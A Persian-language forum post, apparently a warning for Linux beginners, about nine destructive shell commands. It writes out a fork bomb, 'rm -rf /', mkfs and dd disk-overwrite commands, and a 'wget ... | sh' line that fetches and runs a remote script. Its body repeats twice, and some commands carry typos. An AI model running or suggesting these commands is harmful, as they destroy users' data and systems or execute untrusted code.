![[-]](https://forum.romaak.ir/images/first18/collapse.png "[-]")
۹۶/۸/۱، ۰۵:۰۳ صبح
فرامین ترمینال یا شل در لینوکس بسیار قدرتمند هستند و تنها یک فرمان ساده میتواند منجر به حذف یک فایل، فولدر یا موارد خطرات دیگر شود. در برخی از موارد لینوکس حتی برای دریافت تاییدیه اجرای یک فرمان هیچ سوالی نمیپرسد و با اجرای مستقیم آن باعث از بین رفتن اطلاعات ارزشمند شما میشود.
معمولا تازه کاران لینوکس برای یادگیری فرامین به وب مراجعه میکنند و اگر منابع مورد اطمینان نباشد ممکن است با پیشنهاداتی برای اجرای برخی از فرامین توسط برخی از کاربران مواجه شوند که برای شوخی و سرگرمی ارسال شدهاند، اما برای این تازه کاران نه تنها شوخی نیست بلکه باعث دردسر آنها میشود.
نکته مهم این که بعضی از این فرامین تنها در صورت استفاده شدن با پیشوند sudo در اوبونتو میتوانند خطرناک باشند. در توزیعهای دیگر لینوکس نیز خیلی از فرامین تنها در صورتی که به عنوان فرامین ریشه اجرا شوند خطرناک هستند.
ما برخی از فرامین لینوکس که میتواند برای سیستم شما مضر باشد را گردآوری کردهایم تا به شما کمک کند از آنها دوری کنید. به یاد داشته باشید كه برخی از آنها واقعا خطرناک هستند و حتی میتوانند به روشهای مختلف برای ایجاد دستورات جدید که صدمات بیشتری ایجاد میکند تغییر داده شوند.
1. فرمان Fork Bomb در لینوکس
: (){ :|: & };: که با عنوان Fork Bomb نیز شناخته میشود یک حمله انکار سرویس در مقابل سیستم لینوکس است. : (){ :|: & };: یک تابع bash است. به محض اجرا خود را چندین بار تکرار میکند تا سیستم از کار بیافتد.
شما برای رهایی از آن تنها باید سیستم را ریاستارت کنید. بنابراین در زمان اجرای این فرمان در پوسته لینوکس خود مراقب باشید.
2. فرمان mv folder/dev/null
mv folder/dev/null یکی دیگر از فرامین خطرناک است. Dev/null یا null device یک فایل دیوایس است که تمام دادههای نوشته شده روی آن را پاک میکند، اما گزارش میدهد که عملیات نوشتن با موفقیت انجام شده است. از این فرمان به عنوان bit bucked یا black hole نیز یاد میشود.
3. فرمان rm –rf
فرمان rm –rf یک راه سریع برای حذف یک فولدر و محتویات درون آن در سیستم عامل لینوکس است. اگر شما روش صحیح استفاده از آن را بلد نباشید ممکن است به یک فرمان خطرات برای سیستم تبدیل شود. معروفترین ترکیبات و گزینههای مورد استفاده با فرمان rm –rf شامل این موارد هستند:
اگر شما هدفmkfs را به درستی نشناسید میتواند به یک فرمان خطرناک تبدیل شود. هر چیزی که بعد از mkfs نوشته میشود فرمت شده و با سیستم فایل لینوکس خالی جایگزین میشود.
تمام فرامین فهرست شده در زیر هارد درايو شما را فرمت خواهد کرد و به مجوز مدیریتی نیاز دارد:
5. بمب Tar
از فرمان Tar برای جمع آوری چندین فایل داخل یک فایل واحد (یا فایل آرشیو) با فرمت .tar استفاده میشود. اما با این فرمان میتوان یک بمب Tape Archive (Tar) ساخت.
در یک فایل آرشیو که با هزاران یا حتی میلیونها فایل هم نام با فایلهای موجود در دایرکتوری جاری پر شده است در زمان استخراج این فایلها با مشکل مواجه خواهید شد. شما میتوانید با ساخت یک دایرکتوری محافظ در زمان دریافت یک فایل tar از گرفتار شدن در وضعیت بمب tar جلوگیری کنید.
اگر یک فایل tar به این وضعیت دچار شد شما به راحتی با حذف این دایرکتوری تازه ساخته شده میتوانید از دست آن خلاص شوید. یک راه دیگر برای جلوگیری از انفجار بمب tar استفاده از گزينه –t برای فهرست کردن تمام محتوای یک فایل tar است که اطلاعاتی در مورد محتوای داخل این فایل tar در اختیار شما قرار میدهد.
6. فرمان dd
از فرمان dd برای کپی و تبدیل کردن پارتيشنهای هارد دیسک استفاده میشود. اما اگر شما مقصد را به درستی تعیین نکنید میتواند آسیب رسان شود.
این فرمان ممکن است به یکی از این اشکال باشد:
7. کد Shell Script
شما ممکن است با دانلود و اجرای یک اسکریپت پوسته مخرب قربانی آن شوید. این اسکریپت ممکن است شامل کدهای مخرب و خطرناک در داخل خود باشد. فرمت این فرمان ممکن است چیزی شبیه به این باشد:
فرمان wget این اسکریپت را دانلود میکند و sh باعث اجرا شدن فایل دانلود شده میشود.
8. کدهای منبع مخرب
ممکن است شخصی به شما یک کد منبع را پیشنهاد کند و از شما بخواهد آن را کامپایل کنید. شاید در ظاهر این کد طبیعی به نظر برسد اما در واقع کدهای مخرب داخل حجم زیادی از کدهای منبع پنهان شده است و میتواند به سیستم شما صدمه بزند. برای جلوگیری از قربانی شدن توسط این نوع از حملات، این کدهای منبع پیشنهادی را تنها از منابع معتبر و شناخته شده قبول کنید.
9. بمب Decompression
شما ممکن است یک فایل فشرده شده دریافت کنید که در ظاهر حجم زیادی ندارد اما محتوای درون آن با سطح فشرده سازی بالا پر شده است. به محض این که این فایل را از حالت فشرده خارج میکنید حجم انبوهی از داده هارد درايو شما را پر کرده و عملکرد سیستم شما را پایین میآورد. برای جلوگیری از این وضعیت همیشه دادههای مورد نظر خود را از منابع معتبر دریافت کنید.
نکته مهم این که بعضی از این فرامین تنها در صورت استفاده شدن با پیشوند sudo در اوبونتو میتوانند خطرناک باشند. در توزیعهای دیگر لینوکس نیز خیلی از فرامین تنها در صورتی که به عنوان فرامین ریشه اجرا شوند خطرناک هستند.
ما برخی از فرامین لینوکس که میتواند برای سیستم شما مضر باشد را گردآوری کردهایم تا به شما کمک کند از آنها دوری کنید. به یاد داشته باشید كه برخی از آنها واقعا خطرناک هستند و حتی میتوانند به روشهای مختلف برای ایجاد دستورات جدید که صدمات بیشتری ایجاد میکند تغییر داده شوند.
1. فرمان Fork Bomb در لینوکس
: (){ :|: & };: که با عنوان Fork Bomb نیز شناخته میشود یک حمله انکار سرویس در مقابل سیستم لینوکس است. : (){ :|: & };: یک تابع bash است. به محض اجرا خود را چندین بار تکرار میکند تا سیستم از کار بیافتد.
شما برای رهایی از آن تنها باید سیستم را ریاستارت کنید. بنابراین در زمان اجرای این فرمان در پوسته لینوکس خود مراقب باشید.
2. فرمان mv folder/dev/null
mv folder/dev/null یکی دیگر از فرامین خطرناک است. Dev/null یا null device یک فایل دیوایس است که تمام دادههای نوشته شده روی آن را پاک میکند، اما گزارش میدهد که عملیات نوشتن با موفقیت انجام شده است. از این فرمان به عنوان bit bucked یا black hole نیز یاد میشود.
3. فرمان rm –rf
فرمان rm –rf یک راه سریع برای حذف یک فولدر و محتویات درون آن در سیستم عامل لینوکس است. اگر شما روش صحیح استفاده از آن را بلد نباشید ممکن است به یک فرمان خطرات برای سیستم تبدیل شود. معروفترین ترکیبات و گزینههای مورد استفاده با فرمان rm –rf شامل این موارد هستند:
- فرمان rm برای پاک کردن فایلها در سیستم لینوکس استفاده میشود.
- فرمان rm –f فایلهای فقط خواندنی موجود در یک فولدر را بدون هیچ پیغام هشدارهای حذف میکند.
- فرمان rm –r محتوای یک فولدر را حذف میکند.
- فرمان rm –d برای پاک کردن یک دایرکتوری خالی استفاده میشود و اگر این دایرکتوری خالی نباشد از حذف آن اجتناب میکند.
- فرمان rm -rf/ برای حذف اجباری (حتی اگر در برابر بازنويسی محافظت شده باشد) محتوای دایرکتوری ریشه و زیر فولدرهای آن استفاده میشود.
- فرمان rm -rf* برای حذف اجباری تمام محتوای فولدر جاری و زیر فولدرهای آن استفاده میشود.
- فرمان rm -rf. نیز برای حذف اجباری تمام محتوای فولدر جاری و زیر فولدرهای آن استفاده میشود. میتوان از فرمان rm -r.[^.]* نیز استفاده کرد.
- فرمان rm –i برای حذف فایلها و فولدرها استفاده میشود اما قبل از حذف با پیغام به شما هشدار میدهد.
اگر شما هدفmkfs را به درستی نشناسید میتواند به یک فرمان خطرناک تبدیل شود. هر چیزی که بعد از mkfs نوشته میشود فرمت شده و با سیستم فایل لینوکس خالی جایگزین میشود.
تمام فرامین فهرست شده در زیر هارد درايو شما را فرمت خواهد کرد و به مجوز مدیریتی نیاز دارد:
- mkfs
- mkfs.ext3
- mkfs.bfs
- mkfs.ext2
- mkfs.minix
- mkfs.msdos
- mkfs.reiserfs
- mkfs.vfat
5. بمب Tar
از فرمان Tar برای جمع آوری چندین فایل داخل یک فایل واحد (یا فایل آرشیو) با فرمت .tar استفاده میشود. اما با این فرمان میتوان یک بمب Tape Archive (Tar) ساخت.
در یک فایل آرشیو که با هزاران یا حتی میلیونها فایل هم نام با فایلهای موجود در دایرکتوری جاری پر شده است در زمان استخراج این فایلها با مشکل مواجه خواهید شد. شما میتوانید با ساخت یک دایرکتوری محافظ در زمان دریافت یک فایل tar از گرفتار شدن در وضعیت بمب tar جلوگیری کنید.
اگر یک فایل tar به این وضعیت دچار شد شما به راحتی با حذف این دایرکتوری تازه ساخته شده میتوانید از دست آن خلاص شوید. یک راه دیگر برای جلوگیری از انفجار بمب tar استفاده از گزينه –t برای فهرست کردن تمام محتوای یک فایل tar است که اطلاعاتی در مورد محتوای داخل این فایل tar در اختیار شما قرار میدهد.
6. فرمان dd
از فرمان dd برای کپی و تبدیل کردن پارتيشنهای هارد دیسک استفاده میشود. اما اگر شما مقصد را به درستی تعیین نکنید میتواند آسیب رسان شود.
این فرمان ممکن است به یکی از این اشکال باشد:
- dd if=/dev/hda of=/dev/hdb
- dd if=/dev/hda of=/dev/sdb
- dd if=something of=/dev/hda
- dd if=something of=/dev/sda
dd if=/dev/zero of=/dev/had
7. کد Shell Script
شما ممکن است با دانلود و اجرای یک اسکریپت پوسته مخرب قربانی آن شوید. این اسکریپت ممکن است شامل کدهای مخرب و خطرناک در داخل خود باشد. فرمت این فرمان ممکن است چیزی شبیه به این باشد:
wget http://some_malicious_source -O- | sh
فرمان wget این اسکریپت را دانلود میکند و sh باعث اجرا شدن فایل دانلود شده میشود.
8. کدهای منبع مخرب
ممکن است شخصی به شما یک کد منبع را پیشنهاد کند و از شما بخواهد آن را کامپایل کنید. شاید در ظاهر این کد طبیعی به نظر برسد اما در واقع کدهای مخرب داخل حجم زیادی از کدهای منبع پنهان شده است و میتواند به سیستم شما صدمه بزند. برای جلوگیری از قربانی شدن توسط این نوع از حملات، این کدهای منبع پیشنهادی را تنها از منابع معتبر و شناخته شده قبول کنید.
9. بمب Decompression
شما ممکن است یک فایل فشرده شده دریافت کنید که در ظاهر حجم زیادی ندارد اما محتوای درون آن با سطح فشرده سازی بالا پر شده است. به محض این که این فایل را از حالت فشرده خارج میکنید حجم انبوهی از داده هارد درايو شما را پر کرده و عملکرد سیستم شما را پایین میآورد. برای جلوگیری از این وضعیت همیشه دادههای مورد نظر خود را از منابع معتبر دریافت کنید.
